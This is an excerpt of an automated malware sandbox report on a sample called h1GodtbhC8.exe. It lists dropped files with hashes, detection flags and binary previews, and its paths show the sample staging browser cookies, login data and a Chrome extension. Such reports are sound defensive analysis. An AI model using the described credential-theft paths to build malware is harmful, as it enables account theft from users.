                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  C:\Program Files (x86)\71eza90awf48\aliens.exeh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dllh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                      KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                        C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dllh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                          KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                            C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dllh1GodtbhC8.exeGet hashmaliciousBrowse
                                                                                                                                              KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                                                                                                                                C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeh1GodtbhC8.exeGet hashmaliciousBrowse

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):506545472
                                                                                                                                                  Entropy (8bit):0.13665136586177498
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:
                                                                                                                                                  MD5:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  SHA1:6E8585C0596C41CEAF1EEA7E8AEEFF3393A4F126
                                                                                                                                                  SHA-256:6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
                                                                                                                                                  SHA-512:B92564EB4995FD6637F8EAECD6AAC285C8527DECEDF21D423491F98040962ABACFA4F27977E43DA7ED8DCF4B190156DA5EFAF146E2DD76FB0E51D77476F65D3E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: MZ......................@............................................@.....3.!This program cannot be run in DOS mode....$.......g.&.#aH.#aH.#aH..?L.%aH.N<N. aH.N<I.,aH.#aI..aH..?L.(aH..?.."aH..?J."aH.Rich#aH.........................PE..L....sQY.................v....... .. 9............@.................................Ti....@.............................................0...........l..89..........p...T..............................@............................................text...bt.......v.................. ....rdata..(#.......$...z..............@..@.data...............................@....ndata... ...`...........................rsrc....0.......2..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibCa.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4096
                                                                                                                                                  Entropy (8bit):6.867501832742936
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:PAWqGuIO1w7JElw764ulqk4uWdCXufAx8Su2yk:oWaIO1S7ulqBhv+yk
                                                                                                                                                  MD5:04F3C7753A4FCABCE7970BFA3B5C76FF
                                                                                                                                                  SHA1:34FC37D42F86DAC1FD1171A806471CDFEAE9817B
                                                                                                                                                  SHA-256:A735E33A420C2AD93279253BC57137947B5D07803FF438499AAAF6FD0692F4CD
                                                                                                                                                  SHA-512:F774FC3F3EBF029DC6F122669060351CC58AE27C5224ABE2A6C8AB1308C4B796657D2F286760EB73A2AE7563EEEF335DAA70ED5E4B2560D34CA9873017658AFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ..MZ.........0......8-..@.8.0..p.........!...L.!This. program. cannot .be run i.n DOS mo.de....$...PE..L....d82........!..0............. ..B................... ...........@..*..-......#......`....O...+h..........(.Q..........8W.....O......HA...text..........u.[.......`.rsrc...M;.}.t.......@.0relo...U..)......B.......5...&......S..4o.......F.......s....(.....*..(....{.%...{.9....[...4.*..(".....}...."}A...}....D.}..6..B.(...+**D...* 6..si.......*...0.....,....(.....~......oRj..*&.....N"(@M.-...on.A..0......!H.(...o...."r..p(...(.E..r@.po.@.....o..........%.B.....(.@........o...&..% ....o.x......u...,..B...o!..B!....!...~...Tu.."..[......#E..8...o"..$Q ....c..o....*..*..`......IT..G.:. `....@;.`.0...`. 5.@.r?..pB1..s#.....A.R.%.r..p.%.DrW...%..*rFq .b*..s....%.o%@.%.oB&....o'...Do(..........o)......"o.>.o+..,oE..,a..+?.,-.@.t.7.a-%o......Yo/.../.o.].....-...r..../. #"...1..-......u.>....., ...o2......#...>....L....X..a"0.$..V..h".r..."3a..r.`.rZ@..p.(4 ....+!rh..c.B..r...po..D.U.*..*.
                                                                                                                                                  C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):52520
                                                                                                                                                  Entropy (8bit):6.011934677477037
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:9GyM4uxlvOe/c1xpfLIa97v3A5KobiPWh:9G1vt/g7fLb97Y5VmY
                                                                                                                                                  MD5:928E680DEA22C19FEBE9FC8E05D96472
                                                                                                                                                  SHA1:0A4A749DDFD220E2B646B878881575FF9352CF73
                                                                                                                                                  SHA-256:8B6B56F670D59FF93A1C7E601468127FC21F02DDE567B5C21A5D53594CDAEF94
                                                                                                                                                  SHA-512:5FBC72C3FA98DC2B5AD2ED556D2C6DC9279D4BE3EB90FFD7FA2ADA39CB976EBA7CB34033E5786D1CB6137C64C869027002BE2F2CAD408ACEFD5C22006A1FEF34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: h1GodtbhC8.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: KeJ7Cl7flZ.exe, Detection: malicious, Browse
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d82............!..0.................. ........... ....................... ............@.....................................O.......h...............(...............8............................................ ............... ..H............text........ ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........S..4o..........................................................F......s....(....*..(....*..{....*..{....*..{....*..{....*..(......}......}......}.......}....*6..{....(...+**..{......*6..si........*...0...........(.....~........oj...*&~.......*N(....-.~.....on...*.0..........(....o......r...p(....(....r...po.......o...........%.~.......(..........o....&........o .......u....,.~......o!...on... ...!...~..u....,.~......o!...on... ..."...[..u....,.~......o!...on... ...#
                                                                                                                                                  C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\sib.dat
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1864
                                                                                                                                                  Entropy (8bit):4.120386562888434
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:1AC+F9cbv+WfJBHIxp3Cub2/SG+Degz21A:W3M/xBH+yTSG+S9A
                                                                                                                                                  MD5:F3C315D955C48E6071E1BC1C87C46FD7
                                                                                                                                                  SHA1:82340C833CAC7048E1A58A3EC40EB4540535E2A4
                                                                                                                                                  SHA-256:D09D9E3F16C53ABEB7F25D408F686C708C6240971FC46AF7BF68EC5BD7846724
                                                                                                                                                  SHA-512:7D7C1AF8549E21A045B9983D7B67BBA347823955B829A4ACFB0DD1878DBB34D7EA320B3FA9D7F5FF028E2793B5B852B668BFE4213FFF8678FB87B9F7B4295256
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ...&{.7.C.9.9.9.A.A.A.-.B.9.1.E.-.4.8.7.E.-.9.7.B.D.-.7.6.1.9.B.4.5.5.3.2.F.4.}.....p.3.........................a.d.m.i.n.....0...0...0.............I.:.\.n.e.w._.k.i.l.l.\.p.3.\.e.x.e.....p.3.(.1.)...e.x.e..E.{. "appVersion": "6.0.8",. "arpNoRemove": true,. "arpNoRepair": true,. "arpNoShow": true,. "lang": "en-US",. "productCode": "{7C999AAA-0000-487E-97BD-7619B45532F4}",. "uiScriptTest": false,. "uid": "{FC53B0A8-C9C1-4544-9DD9-C73A991A2A42}",. "upgradeCode": "{9FF45220-3173-4DBF-A859-03B8BC20235F}".}...!%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l.,........................................................&{.0.0.7.6.C.E.B.B.-.D.4.4.3.-.4.3.C.7.-.9.2.A.5.-.C.4.8.7.F.2.B.5.F.5.4.A.}.........s.e.t.u.p.........I.:.\.n.e.w._.k.i.l.l.\.p.3.\.s.e.t.u.p...e.x.e.................T.e.m.p.\.0.\.s.e.t.u.p...e.x.e.....-.s.........................................]{."ignoreFailure": false,."uiDisabled" : false,."uiHidden" : false,."uiUnSelected" : false
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186571999
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186582639
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Cookies1607186588295
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.png
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.png
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.json
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.html
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.js
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Login Data1607186571889
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Login Data1607186582639
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Login Data1607186588249
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log
                                                                                                                                                  Process:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):135
                                                                                                                                                  Entropy (8bit):5.045303121991894
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QHXMKa/xwwUCztJXILKNUhh+9Am12MFuAvOAsDeieVyn:Q3La/xwczfIWW+P12MUAvvrs
                                                                                                                                                  MD5:BB527FDBC763485B0662FCCFD53AA00A
                                                                                                                                                  SHA1:86438ECBAF308B24FA264C7B6ECECDABD1338DC0
                                                                                                                                                  SHA-256:6158C0B5B794617AAD8DA6D671FEF9EDE9CAB2AA9A9FAD91D038739DFF5CEDBD
                                                                                                                                                  SHA-512:2003E36806330552D7DD5E633F24A67F2F4226C12EE43A6F79BB709727DD52910CA5EAF336F9C1E5733C66BC3075CA24CACA19D086BE373B76AA08D3FA818106
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1607186617055
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1607186619758
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  File Type:empty
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):0
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                                  SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                                  SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                                  SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  Process:C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):487587840
                                                                                                                                                  Entropy (8bit):0.14148337259986293
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:
                                                                                                                                                  MD5:17DADCF866BF1C23879BECB8AC4386D5
                                                                                                                                                  SHA1:B8B58997D30C327EAB2F75E7903A99DC9156A562
                                                                                                                                                  SHA-256:4CD4B76802D5E8770E1609DD3816FB254B6491A80CB89A6A613320796E023CCE
                                                                                                                                                  SHA-512:2C753F690AB872DDF7D18844B72AF1F9B769E141927C84BD7CF37336FE96E1E004D8518C75335FD526EB5DB44553406D687AE3D6389204C1D0819D86BC0959FB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
